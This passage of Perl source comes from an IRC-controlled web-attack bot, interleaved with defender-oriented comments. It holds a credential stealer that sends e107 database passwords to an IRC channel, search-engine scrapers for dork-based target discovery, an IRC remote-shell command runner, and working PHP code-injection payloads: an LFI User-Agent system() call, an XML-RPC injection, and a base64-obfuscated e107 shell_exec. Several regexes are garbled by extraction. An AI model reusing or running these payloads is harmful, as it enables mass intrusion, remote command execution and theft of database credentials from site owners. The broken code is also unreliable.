#  - Values extracted: mySQLserver, mySQLuser, mySQLpassword, mySQLdefaultdb.
#  - The values are relayed as PRIVMSG text to the channel; after any hit the
#    database password must be rotated, since it has left the host.
sub e107_cuk() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $request = HTTP::Request->new(GET=>$url);
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
my $response = $browser->request($request);
if ($response->is_success) {
# as_string includes the response headers as well as the body.
my $res = $response->as_string;
if ($res =~ m/mySQLserver = '(.*)'/g) {
&msg("$chan","$e107logosql (4@VULN) http://".$site." [+]DB Server: $1");
}
if ($res =~ m/mySQLuser = '(.*)'/g) {
&msg("$chan","$e107logosql (4@VULN) http://".$site." [+]DB username: $1");
}
if ($res =~ m/mySQLpassword = '(.*)'/g) {
&msg("$chan","$e107logosql (4@VULN) http://".$site." [+]DB password: $1");
}
if ($res =~ m/mySQLdefaultdb = '(.*)'/g) {
&msg("$chan","$e107logosql (4@VULN) http://".$site." [+]DB database: $1");
}
}
}
#########################################
# search_engine: dispatcher that turns an engine label into a call to the
# matching scraper sub, collects the returned links, passes them through
# clean() (defined outside this excerpt) and returns the result.
# Arguments: $_[0] IRC channel, $_[1] path suffix, $_[2] search query,
# $_[3] engine label, $_[4] logo string. Only $dork and $engine are used;
# $chan and $logo appear solely in the disabled status line near the end.
#
# Analyst notes for defenders:
#  - The label is compared with "eq", so matching is exact and
#    case-sensitive ("GooGLe", "YahOo", ...); an unknown label yields an
#    empty list.
#  - Target selection is entirely search-result driven: sites are picked
#    because they are indexed for the query, not because of who owns them.
#    Keeping admin and plugin paths out of search indexes reduces exposure to
#    this kind of scan but does not replace patching.
sub search_engine() {
my (@total,@clean);
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $logo = $_[4];
if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }
if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork); push(@total,@altavista); }
if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }
if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }
if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }
if ($engine eq "ExaLead") { my @exalead = &exalead($dork); push(@total,@exalead); }
if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }
if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }
if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }
if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }
if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }
if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }
if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }
if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }
if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }
if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }
if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }
if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }
if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }
if ($engine eq "TisCali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }
if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }
@clean = &clean(@total);
# &msg("$chan","$logo4 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).")");
return @clean;
}
#########################################
# isFound: fetches $link with get_content() and returns 1 when the body
# matches $reqexp, otherwise 0.
# Arguments: $_[0] URL to fetch, $_[1] pattern to look for.
# Note: $reqexp is interpolated into the match as a regular expression, not
# compared as a literal string.
sub isFound() {
my $status = 0;
my $link = $_[0];
my $reqexp = $_[1];
my $res = &get_content($link);
if ($res =~ /$reqexp/) { $status = 1 }
return $status;
}
# get_content: issues a single GET for $url with a 7 second timeout and
# returns the response content.
# Argument: $_[0] URL to fetch.
#
# Analyst notes for defenders:
#  - The User-Agent header comes from $uagent, which is set outside this
#    excerpt; its value is worth recording as a log indicator once known.
#  - The content is returned whatever the HTTP status, so callers that test
#    the body for a marker string also see error pages.
sub get_content() {
my $url = $_[0];
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}
######################################### SEARCH ENGINE gibla
# google: result scraper. Pages through www.google.com/search for the query
# in steps of 10, and passes each extracted host that does not contain
# "google" to links(), collecting what links() returns.
# Argument: $_[0] search query (encoded by key(), defined outside this
# excerpt). Returns the collected list.
#
# NOTE(review): this listing is damaged by HTML extraction. "$i< =400" has a
# stray space inside the operator, and the link-matching pattern after
# "m/" is missing, so the code below does not parse as shown.
sub google() {
my @list;
my $key = $_[0];
for (my $i=0; $i< =400; $i+=10){
my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
my $res = &search_engine_query($search);
while ($res =~ m/ if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub rediff() {
my @list;
my $key = $_[0];
for (my $i=0; $i< =500; $i+=10) { my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i); $b = "$i"; my $res = &search_engine_query($search); if ($res !~ /firstres=$b\'>/) {$i=500;}
while ($res =~ m/ if ($1 !~ /rediff\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub uol() {
my @list;
my $key = $_[0];
for (my $i=1; $i my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);
my $res = &search_engine_query($search);
if ($res !~ m/pr?xima< \/span>/){$i=500;}
while ($res =~ m/ if ($1 !~ /uol\.com/) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
# bing: result scraper. Pages through www.bing.com/search for the query in
# steps of 10 and passes each extracted host that does not match "bing.com"
# to links(), collecting what links() returns.
# Argument: $_[0] search query (encoded by key(), defined outside this
# excerpt). Returns the collected list.
#
# NOTE(review): this listing is damaged by HTML extraction. "$i< =500" has a
# stray space inside the operator, and the link-matching pattern after
# "m/" is missing, so the code below does not parse as shown.
sub bing() {
my @list;
my $key = $_[0];
for (my $i=1; $i< =500; $i+=10) {
my $search = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");
my $res = &search_engine_query($search);
# When the response contains "Ref A:", "Ref B:" and "Ref C:" the counter is
# pushed to its limit, which ends the paging loop.
if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}
while ($res =~ m/ if ($1 !~ /bing\.com/) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub altavista() {
my @list;
my $key = $_[0];
for (my $i=1; $i< =500; $i+=10){ my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i); my $res = &search_engine_query($search); if ($res !~ /target=\"_self\">Succ/) {$i=500;}
while ($res =~ m/(.+?)\//g) {
if ($1 !~ /altavista/){
my $link = $1;
$link =~ s//g) {
if ($1 !~ /yippy\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
# gutser: result scraper for www.goodsearch.com. Requests result pages 1 to
# 50 for the query, captures every http:// host/path that precedes a closing
# quote and ">", skips captures matching goodsearch, good.is, w3.org or
# quantserve, and passes the rest to links().
# Argument: $_[0] search query (encoded by key(), defined outside this
# excerpt). Returns the collected list.
#
# NOTE(review): "$b< =50" contains a stray space that looks like
# HTML-extraction damage. $b is used without "my" here, so it is Perl's
# global $b rather than a lexical.
sub gutser() {
my @list;
my $key = $_[0];
for ($b=1; $b< =50; $b+=1) { my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0"); my $res = &search_engine_query($search); while ($res =~ m/http:\/\/([^>\"]*)\">/g) {
if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub google2() {
my @list;
my $key = $_[0];
my $b = 0;
my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
for ($b=1; $b< =200; $b+=10) {
my $search = ("http://www.google.".$dom."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
my $res = &search_engine_query($search);
while ($res =~ m/ if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
} return @list;
}
}
sub exalead() {
my @list;
my $key = $_[0];
for ($b=0; $b< =1000; $b+=100) {
my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);
my $res = &search_engine_query($search);
if ($res =~ m//g) {$b=1000;}
while ($res =~ m/ my $link = $1;
if ($link!~ /exalead/){
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub lycos() {
my @list;
my $key = $_[0];
for ($b=0; $b my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {
if ($1 !~ /lycos\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub virgilio() {
my @list;
my $key = $_[0];
for ($b=10; $b my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);
my $res = &search_engine_query($search);
if ($res =~ m/non ha prodotto risultati/i) {$b=500;}
if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}
while ($res =~ m/ if ($1 !~ /baidu\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub kipot() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {
if ($1 !~ /qkport\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub gibla() { #mati#
my @list;
my $key = $_[0];
my $hal = "/search?q=".&key($key);
my $search = ("http://www.gigablast.com".$hal);
my $res = &search_engine_query($search);
while ($res =~ m/Next 10 Results/) {
$search = ("http://www.gigablast.com".$hal);
while ($res =~ m/(.+?)>< \/span>/g) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
if ($res =~ m/
$res = &search_engine_query($search);
}return @list;
}
my @list;
my $key = $_[0];
my $b = 0;
for ($b=0; $b< =50; $b+=1) {
my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
my $cek = $b+1;
my $res = &search_engine_query($search);
if ($res !~ m/$b< \/strong>/i) {$b=50;}
while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {
if ($1 !~ /blekko/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
# onet: result scraper for szukaj.onet.pl. Requests result pages 1 to 50 for
# the query and passes each extracted host that does not match "webcache" or
# "query" to links(), collecting what links() returns.
# Argument: $_[0] search query (encoded by key(), defined outside this
# excerpt). Returns the collected list.
#
# NOTE(review): this listing is damaged by HTML extraction. "$b< =50" has a
# stray space inside the operator, and the link-matching pattern after
# "m/" is missing, so the code below does not parse as shown.
sub onet() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=1; $b< =50; $b+=1) {
my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/ if ($1 !~ /webcache|query/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub sizuka() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=10; $b my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/ if ($1 !~ /szukacz/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub walla() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=0; $b my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/
if ($1 !~ /walla\.co\.il/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub demos() {
my @list;
my $key = $_[0];
my $b = 0;
for ($b=0; $b my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
my $res = &search_engine_query($search);
while ($res =~ m/ if ($1 !~ /search|dmoz/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub rose() {
my @list;
my $key = $_[0];
my $b = 0;
my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];
for ($b=0; $b my $search = ("http://euroseek.com/system/search.cgi?language=".$lang."&mode=internet&start=".$b."&string=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/ if ($1 !~ /euroseek/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
}return @list;
}
sub seznam() {
my @list;
my $key = $_[0];
for ($b=1; $b my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
my $res = &search_engine_query($search);
while ($res =~ m/ if ($1 !~ /seznam/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub tiscali() {
my @list;
my $key = $_[0];
for ($b=0; $b my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
my $res = &search_engine_query($search);
while ($res =~ m/ if ($1 !~ /tiscali/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub naver() {
my @list;
my $key = $_[0];
for ($b=1; $b my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0〈=all&f=&srcharea=all&st=s&fd=2&start=".$b."&display=10");
my $res = &search_engine_query($search);
while ($res =~ m/new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
my @pages = < $sock>;
$page = "@pages";
close($sock);
};
return $page;
}
#########################################
# shell: runs an operator-supplied command on the compromised host and relays
# the output over IRC.
# Arguments: $_[0] IRC target the output is sent to, $_[1] command string.
#
# Analyst notes for defenders:
#  - Anything matching "cd <path>" is handled in-process with chdir(); every
#    other string is handed to the system shell through backticks, so the
#    operator has the full privileges of the account running the script.
#  - The command runs in a double-forked grandchild, so it is not a direct
#    child of the bot process in the process tree.
#  - Detection handles: an unexpected long-lived perl process owned by the
#    web-server account, outbound IRC connections from a web host, and shell
#    children spawned by that perl process. Egress filtering for IRC from web
#    servers cuts this control channel.
sub shell() {
my $path = $_[0];
my $cmd = $_[1];
# The failure message is sent to $path, which here holds the IRC target.
if ($cmd =~ /cd (.*)/) {
chdir("$1") || &msg("$path","4,1No such file or directory");
return;
}
elsif ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
# stderr (and descriptor 3) are redirected so they are captured with stdout.
my @output = `$cmd 2>&1 3>&1`;
my $c = 0;
foreach my $output (@output) {
$c++;
# chop removes the last character of each line unconditionally.
chop $output;
&msg("$path","$output");
# Pause two seconds after every fifth line sent.
if ($c == 5) { $c = 0; sleep 2; }
}
exit;
}}
}
# isAdmin: returns 1 when $nick equals the file-level $admin value, else 0.
# Argument: $_[0] IRC nickname to test.
# The decision is a plain case-sensitive string comparison on the nickname;
# nothing else about the sender is examined in this sub.
sub isAdmin() {
my $status = 0;
my $nick = $_[0];
if ($nick eq $admin) { $status = 1; }
return $status;
}
# msg: sends "PRIVMSG <target> :<text>" on $IRC_cur_socket through sendraw().
# Arguments: $_[0] channel or nick, $_[1] message text.
# Does nothing unless exactly two arguments are passed.
# Analyst note for defenders: every finding in this script (shell URLs,
# database credentials, command output) leaves the host through this sub as
# IRC PRIVMSG traffic.
sub msg() {
return unless $#_ == 1;
sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
}
# nick: issues an IRC "NICK <name>" command through sendraw().
# Argument: $_[0] new nickname. Does nothing unless exactly one argument is
# passed.
# Unlike msg(), no socket handle is passed to sendraw() here.
sub nick() {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
# notice: issues an IRC "NOTICE <target> :<text>" command through sendraw().
# Arguments: $_[0] channel or nick, $_[1] message text. Does nothing unless
# exactly two arguments are passed.
# Unlike msg(), no socket handle is passed to sendraw() here.
sub notice() {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
# cmdlfi: sends a GET to $url with a User-Agent header that carries PHP code,
# then reports whatever the response contains between two "j13mbut" markers.
# Arguments: $_[0] URL to request, $_[1] command string placed in the header,
# $_[2] IRC channel for the result.
#
# Analyst notes for defenders:
#  - The header value is the literal marker "j13mbut", a PHP block calling
#    system() on the command, and the marker again. It only has an effect if
#    the target later includes a file that recorded the header.
#  - Detection: a User-Agent containing a PHP open tag, "system(" or the
#    string "j13mbut" is a reliable signature for request logs and WAF rules.
#  - Mitigation: fix the file-inclusion parameter, and keep logs and
#    process-environment files out of any path the application can include.
#
# NOTE(review): "< ?system" has a space after "<" that looks like
# HTML-extraction damage in this listing.
sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $chan = $_[2];
my $hie = "j13mbut< ?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
$browser->agent("$hie");
$browser->timeout(7);
# $response is assigned without "my", so it is a package variable.
$response = $browser->get( $url );
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
&msg("$chan","15(4@9CMDLFI) $1");
} else {
&msg("$chan","15(4@9CMDLFI)4 No Output");
}
}
# cmdxml: POSTs a text/xml body to $jed whose content embeds a PHP system()
# call on $dwa between the markers "bamby" and "solo", then reports whatever
# the response contains between those markers.
# Arguments: $_[0] URL to post to, $_[1] command string, $_[2] IRC channel
# for the result.
#
# Analyst notes for defenders:
#  - The request uses the fixed User-Agent "perl post" and Content-Type
#    text/xml; both are usable as log indicators.
#  - Detection: XML request bodies containing "system(" together with the
#    markers "bamby" / "solo".
#  - Mitigation: update the XML-RPC handling library on the endpoint and
#    disable the endpoint where it is not needed.
#
# NOTE(review): the XML markup of the payload appears to have been stripped
# by HTML extraction (only "test.method" and fragments remain, and "< ?xml"
# has a stray space), so the body shown is not the one the original sent.
sub cmdxml() {
my $jed = $_[0];
my $dwa = $_[1];
my $chan = $_[2];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
# $exploit is assigned without "my", so it is a package variable.
$exploit = "< ?xml version=\"1.0\"?>";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*";
my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
if ($response->content =~ /bamby(.*)solo/s) {
&msg("$chan","15(4@9CMDXML) $1");
} else {
&msg("$chan","15(4@9CMDXML)4 No Output");
}
}
# cmde107: POSTs a form body to $path in which the author_name field holds
# PHP code wrapped in URL-encoded [php]...[/php] tags, then reports the part
# of the response that follows the string "plaNETWORK".
# Arguments: $_[0] URL to post to, $_[1] command string, $_[2] IRC channel
# for the result.
#
# Analyst notes for defenders:
#  - The command is base64-encoded and placed inside a PHP expression built
#    from base64_decode() and shell_exec() calls, so the plain command text
#    does not appear in the request body.
#  - Detection: form posts containing "send-contactus=1" with
#    "author_name=%5Bphp%5D", or any submitted field carrying "[php]" tags or
#    "shell_exec(base64_decode(".
#  - Mitigation: update the CMS so submitted form fields are never evaluated
#    as PHP.
sub cmde107() {
my $path = $_[0];
my $code = $_[1];
my $chan = $_[2];
my $codecmd = encode_base64($code);
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
my $req = HTTP::Request->new(POST => $path);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
# The User-Agent comes from $uagent, which is set outside this excerpt.
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
# as_string includes the response headers as well as the body.
my $data = $res->as_string;
if ( $data =~ /plaNETWORK(.*)/ ){
# $mydata is assigned without "my", so it is a package variable.
$mydata = $1;
&msg("$chan","15(4@9CMDe107) $mydata");
}
else { &msg("$chan","15(4@9CMDe107)4 No Output"); }
}


